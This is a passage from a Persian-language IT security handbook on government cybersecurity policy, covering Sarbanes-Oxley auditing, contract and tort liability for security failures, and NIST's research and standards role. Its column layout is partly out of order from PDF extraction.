ﺷﺮﻛﺘﻬﺎ ﻫﺴﺘﻨﺪ ﺑﺎ ﺗﺼﻮﻳﺐ ﻗـﻮﺍﻧﻴﻦ ﻛﻴﻔـﺮﻱ ﺗﻘﻮﻳـﺖ ﺷـﺪﻩﺍﻧـﺪ.
ﻗـــﺎﻧﻮﻥ ) Sarbanes-Oxleyﻣـــﺼﻮﺏ ﺳـــﺎﻝ ،(۲۰۰۲ﭼﻨـــﺪ
ﻧﻴﺎﺯﻣﻨــﺪﻱ ﺟﺪﻳــﺪ ﺑــﻪ ﺷــﺮﻛﺘﻬﺎ ﺗﺤﻤﻴــﻞ ﻛــﺮﺩ ﻭ ﺑــﺎ ﺍﻋــﻼﻡ
ﺭﺳــﻮﺍﻳﻲﻫــﺎﻱ ﺍﻣﻨﻴﺘــﻲ ﺩﺭ ﻣﻘﻴــﺎﺱ ﻭﺳــﻴﻊ ﺗﻮﺟــﻪ ﻫﻤﮕــﺎﻥ ﺭﺍ
ﺑﺨﺶ ﭼﻬﺎﺭﻡ
ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺮﺍﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﻣﻨﻴﺘﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﺧـﻮﺩ
ﺍﻧﮕﻴﺰﺓ ﺯﻳﺎﺩﻱ ﺩﺍﺭﻧﺪ ،ﭼﺮﺍﻛﻪ ﻣﻨﺎﻓﻊ ﺁﻧﻬﺎ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﺍﻳـﻦ ﻣﻮﺿـﻮﻉ
ﺍﺳﺖ .ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻳﻚ ﺷﺮﻛﺖ ﺩﺭ ﺑﺮﺍﺑﺮ ﻣﺸﻜﻼﺕ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ
ﺍﺯ ﺧﻮﺩ ﻣﺤﻔﺎﻇﺖ ﻧﻜﻨﺪ ،ﺯﻳﺎﻧﻬﺎﻱ ﺣﺎﺻـﻠﻪ ﻣـﺴﺘﻘﻴﻤﹰﺎ ﻣﻨـﺎﻓﻊ ﺁﻧـﺮﺍ
ﺗﻬﺪﻳﺪ ﻣﻲﻛﻨﻨﺪ .ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﻣﻨﺠﺮ
ﺑﻪ ﺗﻮﻗﻒ ﻓﻌﺎﻟﻴﺖ ﺗﺠﺎﺭﻱ ﻳﻚ ﺷﺮﻛﺖ ﻭ ﺧﺪﺷﻪﺩﺍﺭ ﺷﺪﻥ ﺍﻋﺘﺒـﺎﺭ
ﺁﻥ ﮔﺮﺩﻧﺪ .ﺣﻤﻠﻪ ﺑـﻪ ﺷـﺒﻜﺔ ﺭﺍﻳﺎﻧـﻪ ﺍﻱ ﺷـﺮﻛﺖ ﻣﻤﻜـﻦ ﺍﺳـﺖ
ﻋﻤﻠﻴﺎﺕ ﺁﻧﺮﺍ ﻣﺘﻮﻗﻒ ﻧﻤﺎﻳﺪ ﻭ ﺑﺎﻋﺚ ﺁﺳﻴﺐ ﺩﻳﺪﻥ ﻳﺎ ﺍﺯ ﺑﻴﻦ ﺭﻓﺘﻦ
ﺩﺍﺩﻩﻫﺎﻱ ﻣﺸﺘﺮﻳﺎﻥ ﻳﺎ ﺍﺳﺮﺍﺭ ﺗﺠﺎﺭﻱ ﺷﻮﺩ .ﻫﺮ ﺷـﺮﻛﺘﻲ ﻛـﻪ ﺑـﻪ
ﺍﻣﻨﻴﺖ ﺗﻮﺟﻪ ﻻﺯﻡ ﺭﺍ ﺍﺧﺘﺼﺎﺹ ﻧﺪﺍﺩﻩ ﺑﺎﺷﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﻤـﺎﻣﻲ
ﻣﺸﺘﺮﻳﺎﻥ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺭﻗﺒﺎﻳﻲ ﻭﺍﮔﺬﺍﺭ ﻧﻤﺎﻳﺪ ﻛﻪ ﺑـﻪ ﺍﻣﻨﻴـﺖ ﺗﻮﺟـﻪ
ﻛﺎﻓﻲ ﺩﺍﺭﻧﺪ .ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ ﺳـﺎﺯﻧﺪﮔﺎﻥ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻭ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎ
ﻣﺤﺼﻮﻻﺕ ﻧﺎﺍﻣﻦ ﺗﻮﻟﻴﺪ ﻛﻨﻨﺪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻣـﺸﺘﺮﻳﺎﻥ ﺧـﻮﺩ ﺭﺍ
ﺑﺴﺮﻋﺖ ﺍﺯ ﺩﺳﺖ ﺑﺪﻫﻨﺪ.
ﻣﻮﺭﺩﻱ ،ﺗﻼﺵ ﻣﻲﻛﻨﻨﺪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻗﺎﻧﻮﻧﻤﻨﺪ ﺗﺠﺎﺭﺕ ﺳـﻨﺘﻲ ﺭﺍ
ﺑﺮ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻧﻴﺰ ﺍﻋﻤﺎﻝ ﻛﻨﻨـﺪ .ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻳﻲ ﻛـﻪ
ﺳﻴﺴﺘﻢ ﻗﻀﺎﻳﻲ ﺁﻧﻬﺎ ﺑﻪ ﻗﺎﺿﻲ ﺍﺟـﺎﺯﻩ ﻣـﻲﺩﻫـﺪ ﻣﻔـﺎﻫﻴﻢ ﻛﻠـﻲ
ﻗﺎﻧﻮﻥ ﺭﺍ ﻃﺒﻖ ﺷﺮﺍﻳﻂ ﺟﺪﻳﺪ ﺗﻔﺴﻴﺮ ﻛﻨﺪ ،ﻗﻀﺎﺕ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﻪ
ﺣﻞ ﻣﺴﺎﺋﻞ ﻭ ﻣﺸﻜﻼﺕ ﺣﻘﻮﻗﻲ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻛﻪ ﻧﻴﺎﺯﻣﻨﺪ
ﺗﺼﻤﻴﻢﮔﻴﺮﻱ ﺩﺭﺑﺎﺭﺓ ﻣﻔﺎﻫﻴﻢ ﻗﺎﻧﻮﻧﻲ ﺳﻨﺘﻲ )ﻫﻤﭽﻮﻥ ﺳﻬﻞﺍﻧﮕـﺎﺭﻱ
ﻳﺎ ﻋﺪﻡ ﺍﻧﺠﺎﻡ ﻭﻇﺎﻳﻒ ﻣﺤﻮﻟﻪ ﺩﺭ ﻗﺮﺍﺭﺩﺍﺩ( ﻭ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ
ﺍﺳﺖ ﻛﻤﻚ ﻧﻤﺎﻳﻨﺪ.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
٢٤٤
ﺑﺮﺍﻧﮕﻴﺨﺖ .ﻛﻨﮕﺮﻩ ﺗﺼﻮﻳﺐ ﻛﺮﺩ ﻛﻪ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﺮﺍﻱ
ﺍﺭﺯﻳﺎﺑﻲ ﺩﺍﺩﻩﻫﺎﻱ ﻣﺎﻟﻲ ﺷﺮﻛﺘﻬﺎ ﺿﺮﻭﺭﻱ ﺍﺳﺖ .ﻛﻨﮕﺮﻩ ﻫﻤﭽﻨﻴﻦ
ﺍﺭﺯﻳﺎﺑﻲ ﺷﺮﻛﺘﻬﺎ ﺍﺯ ﻧﻈﺮ ﺍﻣﻨﻴـﺖ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋـﺎﺗﻲ ﺭﺍ ﻧﻴـﺰ
ﺍﻟﺰﺍﻣﻲ ﺩﺍﻧﺴﺖ .ﻫﻤﭽﻨﻴﻦ ﻃﺒﻖ ﻗﺎﻧﻮﻥ ﻋﺎﻡ ﺷﺮﻛﺘﻬﺎ ،ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ
ﺗﺠﺎﺭﻱ ﻋﻤـﻮﻣﻲ ﺑﺎﻳـﺪ ﺗﻮﺳـﻂ ﺣـﺴﺎﺑﺮﺳﺎﻥ ﻏﻴﺮﻭﺍﺑـﺴﺘﻪ ﺗﺤـﺖ
ﺣﺴﺎﺑﺮﺳﻲ ﻣﺎﻟﻲ ﻗﺮﺍﺭ ﮔﻴﺮﻧـﺪ .ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ ﺣـﺴﺎﺑﺮﺳﺎﻥ ﻣﺘﻮﺟـﻪ
ﺷﻮﻧﺪ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳﻨﺎﺩ ﻣﺎﻟﻲ ﺷﺮﻛﺖ ﺭﺍ ﺗﻬﺪﻳﺪ
ﻣﻲﻛﻨﻨـﺪ ،ﺷﺎﺧـﺼﻬﺎﻱ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺭﺍ ﻧﻴـﺰ ﺑـﻪ ﺣﻴﻄـﺔ
ﺣﺴﺎﺑﺮﺳﻲ ﺧﻮﺩ ﺍﺿﺎﻓﻪ ﻣﻲﺳﺎﺯﻧﺪ .ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺮﺗﺒﻂ،
ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻭ ﺭﺍﻫﺒﺮﺩﻫﺎﻳﻲ ﺭﺍ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﺣـﺴﺎﺑﺮﺳﺎﻥ ﺍﻳﺠـﺎﺩ
ﻛﺮﺩﻩﺍﻧﺪ.
ﻗﺎﻧﻮﻥ ﻗﺮﺍﺭﺩﺍﺩ
ﻃﺒــﻖ ﻗــﺎﻧﻮﻥ ﻗــﺮﺍﺭﺩﺍﺩ ،ﺳــﺎﺯﻣﺎﻧﻬﺎ ﺑﺎﻳــﺪ ﻣــﺴﺌﻮﻟﻴﺖ ﺩﺳﺘﺮﺳــﻲ
ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﻳﺎ ﺁﺳﻴﺐ ﻧﺎﺷﻲ ﺍﺯ ﻧﻘـﺎﺋﺺ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﻪ
ﺩﺍﺩﻩﻫﺎﻱ ﻣﺸﺘﺮﻳﺎﻥ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﮔﻴﺮﻧﺪ .ﻃﺒﻖ ﺍﻳﻦ ﻗﺎﻧﻮﻥ ،ﺷﺮﻛﺘﻲ
ﻛﻪ ﺩﺭ ﻣﺘﻮﻥ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻋﻼﻡ ﻣﻲﺩﺍﺭﺩ "ﺍﺯ ﻳﻚ ﺳﻴﺴﺘﻢ ﺍﻳﻤـﻦ
ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ" ،ﺍﻳﻨﮕﻮﻧﻪ ﻓﺮﺽ ﻣﻲﺷﻮﺩ ﻛـﻪ ﺑـﺎ ﻣـﺸﺘﺮﻱ ﺧـﻮﺩ
ﻭﺍﺭﺩ ﻳﻚ ﺗﻮﺍﻓﻖ ﺩﻭﻃﺮﻓﻪ ﺷﺪﻩ ﻛﻪ ﻃﺒﻖ ﺁﻥ ﻣﻮﻇﻒ ﺑﻪ ﺗﻌﺎﻣﻞ ﺑـﺎ
ﻣــﺸﺘﺮﻳﺎﻥ ﺩﺭ ﻣﺤﻴﻄــﻲ ﺍﻣــﻦ ﻣــﻲﺑﺎﺷــﺪ .ﺩﺭ ﭼﻨــﻴﻦ ﺣــﺎﻟﺘﻲ،
ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻣﺸﺘﺮﻱ ﺑﺎ ﺣﻤـﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﺑﻪ ﺧﻄﺮ ﺑﻴﺎﻓﺘﺪ ﻣﺸﺘﺮﻱ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺩﻋـﺎﻱ ﻧﻘـﺾ ﺗﻌﻬـﺪﺍﺕ ﻛﻨـﺪ.
ﻫﻤﭽﻨﻴﻦ ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﺧﺪﻣﺎﺕ ﻣﺒﺘﻨﻲ ﺑﺮ ﻭﺏ ﺍﺭﺍﺋﻪ ﻣﻲﻧﻤﺎﻳﻨـﺪ
ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮ ﺣﺴﺐ ﻗﺮﺍﺭﺩﺍﺩ ،ﻣـﺴﺌﻮﻟﻴﺖ ﺩﺭ ﺩﺳـﺘﺮﺱ ﺑـﻮﺩﻥ
ﺧﺪﻣﺎﺕ ﺧﻮﺩ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﺑﮕﻴﺮﻧﺪ .ﺩﺭ ﺍﻳﻨﺤﺎﻟﺖ ﻧﻴـﺰ ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ
ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺩﺭ ﺍﺛﺮ ﺣﻤﻼﺕ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ٦٩ﺍﺯ ﻓﻌﺎﻟﻴﺖ ﻭ ﺍﺭﺍﺋﻪ
ﺳﺮﻭﻳﺲ ﺑﺎﺯ ﺑﻤﺎﻧﺪ ،ﺷﺮﻛﺖ ﺩﺭ ﻣﻌﺮﺽ ﺍﺩﻋـﺎﻱ ﻧﻘـﺾ ﺗﻌﻬـﺪﺍﺕ
ﺗﻮﺳﻂ ﻣﺸﺘﺮﻳﺎﻥ ﻗﺮﺍﺭ ﺧﻮﺍﻫﺪ ﮔﺮﻓﺖ.
ﻗﺎﻧﻮﻥ ﺟﺮﺍﺋﻢ ﻏﻴﺮﻋﻤﺪﻱ
ﺍﺯ ﻧﻈﺮ ﺣﻘﻮﻗﻲ ،ﻣﻔﻬﻮﻡ ﺟﺮﺍﺋﻢ ﻏﻴﺮﻋﻤﺪﻱ )ﻣﺴﺌﻮﻟﻴﺖ ﻣﺪﻧﻲ ﺩﺭ ﻗﺒـﺎﻝ
ﺧﺴﺎﺭﺗﻬﺎﻱ ﺳﻬﻮﻱ( ﺩﺭ ﻣﻮﺭﺩ ﺍﻧﻮﺍﻉ ﺁﺳﻴﺒﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﻜـﺎﺭ
ﻣﻲﺭﻭﺩ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺑﺎ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻦ ﻗﺎﻧﻮﻥ ﺳﻨﺘﻲ ﺟﺮﺍﺋﻢ ﺑﺮﺍﻱ
ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ،ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺷـﺮﻛﺖ ﺍﻗـﺪﺍﻣﺎﺕ ﻣﻨﻄﻘـﻲ ﺑـﺮﺍﻱ
ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﻣﺸﺘﺮﻱ ﺩﺭ ﻣﻘﺎﺑﻞ ﺣﻤﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ
ﭘﻴﺶ ﻧﮕﻴﺮﺩ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﻃﺮﻑ ﻣـﺸﺘﺮﻳﺎﻥ ﺧـﻮﺩ ﺑـﺎ ﺍﺩﻋـﺎﻱ
Denial of Service
69
ﻧﻘﺾ ﺗﻌﻬﺪﺍﺕ ﺭﻭﺑﺮﻭ ﺷﻮﺩ .ﺯﻣﺎﻧﻴﻜﻪ ﺭﺍﻳﺎﻧـﻪ ﻫـﺎﻱ ﻳـﻚ ﺷـﺮﻛﺖ
ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺣﻤﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑـﻪ ﻳـﻚ ﻣﻘـﺼﺪ ﺛﺎﻟـﺚ ﺑﻜـﺎﺭ
ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﻧﺪ ،ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺍﻗﺪﺍﻣﺎﺕ ﻣﺆﺛﺮ ﺑـﺮﺍﻱ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ
ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﻧﺠﺎﻡ ﻧﺸﺪﻩ ﺑﺎﺷﺪ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﺮﻛﺖ ﻣﻴـﺎﻧﻲ
ﻣﻘﺼﺮ ﺷﻨﺎﺧﺘﻪ ﺷﻮﺩ .ﺯﻣﺎﻧﻴﻜﻪ ﺣﻤﻠﻪ ﺍﻱ ﺗﻮﺳﻂ ﻳﻜﻲ ﺍﺯ ﻛﺎﺭﻣﻨﺪﺍﻥ
ﺷﺮﻛﺖ ﺻﻮﺭﺕ ﻣﻲﭘﺬﻳﺮﺩ ﻗﺮﺑﺎﻧﻴﺎﻥ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑـﺎ ﺍﺛﺒـﺎﺕ ﺍﻳـﻦ
ﻣﻮﺿﻮﻉ ﺷﺮﻛﺖ ﺭﺍ ﻣﺘﻬﻢ ﺑﻪ ﻧﺎﺩﻳﺪﻩ ﮔﺮﻓﺘﻦ ﺿﻮﺍﺑﻂ ﻭ ﻣﻌﻴﺎﺭﻫـﺎﻱ
ﻻﺯﻡ ﺍﺳﺘﺨﺪﺍﻣﻲ ﻳﺎ ﻧﻈﺎﺭﺗﻲ ﻧﻤﺎﻳﻨﺪ.
ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺣﺘﻲ ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻫـﻢ -ﻛـﻪ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ
ﻣﻮﺍﺭﺩ ،ﻗﻮﺍﻧﻴﻦ ﺟﺮﺍﺋﻢ ﻏﻴﺮﻋﻤـﺪﻱ ﻣﻮﺟـﻮﺩ ﻫـﺴﺘﻨﺪ -ﺍﻳـﻦ ﻧـﻮﻉ
ﻗﻮﺍﻧﻴﻦ ﭼﻨﺪﺍﻥ ﺗﻬﻴﻪ ﻧﺸﺪﻩﺍﻧﺪ ﻭ ﺗﺎﻛﻨﻮﻥ ﺩﺍﺩﮔﺎﻫﻬﺎ ﺗﻮﺟﻪ ﺑﻪ ﺍﻣﻨﻴﺖ
ﺷﺒﻜﻪ ﺭﺍ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻭﻇﻴﻔﺔ ﻗﺎﻧﻮﻧﻲ ﺍﻋﻼﻡ ﻧﻨﻤﻮﺩﻩ ﺍﻧﺪ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ
ﺷــﺎﻳﺪ ﺗﻨﻬــﺎ ﮔﺬﺷــﺖ ﺯﻣــﺎﻥ ﺑﺘﻮﺍﻧــﺪ ﺗﺌﻮﺭﻳﻬــﺎﻱ ﻗــﺪﻳﻤﻲ
ﻣﺴﺌﻮﻟﻴﺖﭘﺬﻳﺮﻱ ﺭﺍ ﺩﺭ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻛﻨـﺪ .ﺩﺭ
ﺁﻥ ﺯﻣﺎﻥ ﺩﺍﺩﮔﺎﻫﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺭﺍ
ﺍﺯ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﺍﻥ ﻭ ﺟﺎﻣﻌﺔ ﺗﺠـﺎﺭﻱ ﺩﺭﻳﺎﺑﻨـﺪ ،ﻭ
ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺗﻮﺳـﻂ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺧـﻮﺩ-ﻗﺎﻧﻮﻧﮕـﺬﺍﺭ
ﺍﺻﻼﺡ ﺷﻮﻧﺪ.
٢٤٥
ﺑﺨﺶ ﭼﻬﺎﺭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ
ﺑﺮﺍﻱ ﺍﻓﺰﺍﻳﺶ ﺑﻬـﺮﻩ ﻭﺭﻱ ،ﺗـﺴﻬﻴﻞ ﺗﺠـﺎﺭﺕ ،ﻭ ﺑﻬﺒـﻮﺩ ﻛﻴﻔﻴـﺖ
ﺯﻧﺪﮔﻲ ﺍﺳﺖ.
ﺑﺨــﺶ ﺍﻣﻨﻴــﺖ ﺭﺍﻳﺎﻧــﻪﺍﻱ NISTﺑــﺮﺍﻱ ﺍﺭﺗﻘــﺎﻱ ﺍﻣﻨﻴــﺖ ﻳــﻚ
ﺳﻴﺴﺘﻢ ﺍﻃﻼﻋﺎﺗﻲ ﺑﻪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺯﻳﺮ ﻣﻲﭘﺮﺩﺍﺯﺩ:
ﻓﺼﻞ ﭼﻬﺎﺭﻡ
ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺩﻭﻟﺖ
ﻧﻘﺸﻬﺎﻱ ﻏﻴﺮﺗﻘﻨﻴﻨﻲ ﺩﻭﻟﺖ
ﺭﻭﺷﻬﺎﻱ ﻣﺨﺘﻠﻔﻲ ﺑﺮﺍﻱ ﺍﻋﻤﺎﻝ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺩﻭﻟـﺖ ﺑـﺮ ﺍﻣﻨﻴـﺖ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺍﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ
ﻫﻤﻪ ﺍﺯ ﻧﻮﻉ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ ﻧﻴﺴﺘﻨﺪ؛ ﺑﻠﻜﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺁﻧﻬﺎ ﻛﻪ ﺷـﺎﻳﺪ
ﺗﺄﺛﻴﺮ ﺑﻴﺸﺘﺮﻱ ﻫﻢ ﺩﺍﺭﻧﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺳﻴﺎﺳﺘﻬﺎﻱ ﻏﻴﺮﺗﻘﻨﻴﻨﻲ ﺑﺎﺷﻨﺪ.
ﺗﺤﻘﻴﻖ -ﻳﻜﻲ ﺍﺯ ﻧﻘـﺸﻬﺎﻱ ﻣﻬـﻢ ﺩﻭﻟـﺖ ،ﺗـﺄﻣﻴﻦ ﺳـﺮﻣﺎﻳﻪ ﻭ
ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻖ ﺩﺭﺑـﺎﺭﻩ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪ ﺍﻱ ﺍﺳـﺖ .ﻣﺆﺳـﺴﻪ ﻣﻠـﻲ
ﺍﺳــﺘﺎﻧﺪﺍﺭﺩ ﻭ ﻓﻨــﺎﻭﺭﻱ ﺍﻳــﺎﻻﺕ ﻣﺘﺤــﺪﻩ ) ٧١(NISTﺳــﺎﺯﻣﺎﻥ
ﻏﻴﺮﺗﻘﻨﻴﻨﻲ ﺩﻭﻟـﺖ ﺩﺭ ﻭﺯﺍﺭﺕ ﺑﺎﺯﺭﮔـﺎﻧﻲ ﺍﻳـﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﺍﺳـﺖ.
ﻣﺄﻣﻮﺭﻳﺖ NISTﺗﻬﻴﻪ ﻭ ﺍﺭﺗﻘﺎﻱ ﻣﻌﻴﺎﺭﻫﺎ ،ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻭ ﻓﻨﺎﻭﺭﻱ
and
Standards
Data Protection Directive
National
Institute
of
Technology
70
71
•
ﺗﺤﻘﻴﻖ ،ﻣﻄﺎﻟﻌﻪ ﻭ ﺍﺭﺍﺋﻪ ﺗﻮﺻـﻴﻪ ﺑـﻪ ﺳـﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛـﻪ ﺩﺭ
ﻣﻌﺮﺽ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻫﺴﺘﻨﺪ؛
•
ﺍﻳﺠﺎﺩ ﺭﺍﻫﻜﺎﺭﻫﺎﻳﻲ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﻣﻨﻴﺖ ﺩﺭ ﺳﻴـﺴﺘﻤﻬﺎﻱ
ﺣﺴﺎﺱ ﺩﻭﻟﺖ؛
•
ﺗﻬﻴــﺔ ﺍﺳــﺘﺎﻧﺪﺍﺭﺩﻫﺎ ،ﻣﻌﻴــﺎﺭﻫــﺎ ،ﺁﺯﻣﻮﻧﻬــﺎ ﻭ ﺑﺮﻧﺎﻣــﻪﻫــﺎﻱ
ﺍﻋﺘﺒﺎﺭﺳﻨﺠﻲ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎ ،ﺍﻧﺪﺍﺯﻩ ﮔﻴﺮﻱ ﻭ ﺍﺭﺯﺷﻴﺎﺑﻲ ﺍﻣﻨﻴـﺖ
ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﺳﺮﻭﻳﺴﻬﺎ؛
•
ﺗﺄﻣﻴﻦ ﺣﺪﺍﻗﻞ ﻧﻴﺎﺯﻣﻨـﺪﻳﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺑـﺮﺍﻱ ﺳﻴـﺴﺘﻤﻬﺎﻱ
ﺩﻭﻟﺖ؛
•
ﺍﺭﺍﺋﻪ ﺭﺍﻫﻨﻤﺎﻳﻴﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺍﻳﻤﻦﻛﺮﺩﻥ ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﻃﺮﺍﺣﻲ،
ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ،ﻣﺪﻳﺮﻳﺖ ،ﻭ ﻧﻴﺰ ﻋﻤﻠﻴﺎﺕ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ؛
ﺩﺭ ﺍﻧﺘﺸﺎﺭ ﻋﻤﻮﻣﻲ ﻧﺘﺎﻳﺞ ﺗﺤﻘﻴﻘﺎﺕ ،ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘﻲ ﺑﺎﻳـﺪ ﺑـﻪ
ﻧﻮﻋﻲ ﺑﺮ ﻣﻴﻞ ﺧﻮﺩ ﺑﻪ ﻣﺨﻔﻲﻛﺎﺭﻱ ﻏﻠﺒﻪ ﻛﻨﻨﺪ .ﻳﻚ ﻣﺜﺎﻝ ﺧﻮﺏ
ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ،ﺳـﺎﺯﻣﺎﻥ ﻓـﻮﻕ ﺳـﺮﻱ ﺍﻣﻨﻴـﺖ ﻣﻠـﻲ ﺩﺭ ﺍﻳـﺎﻻﺕ
ﻣﺘﺤﺪﻩ ﺍﺳﺖ ﻛﻪ ﺗﻮﺻﻴﻪﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺧـﻮﺩ ﺭﺍ ﺑـﺮﺍﻱ ﺩﺳﺘﺮﺳـﻲ
ﻫﻤﮕﺎﻥ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻋﻤﻮﻣﻲ ﺳﺎﺯﻣﺎﻥ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺍﺳﺖ.
ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ -ﺩﻭﻟﺖ ﻫﻤﭽﻨﻴﻦ ﻳﻜـﻲ ﺍﺯ ﺗـﺼﻤﻴﻢﮔﻴﺮﻧـﺪﮔﺎﻥ
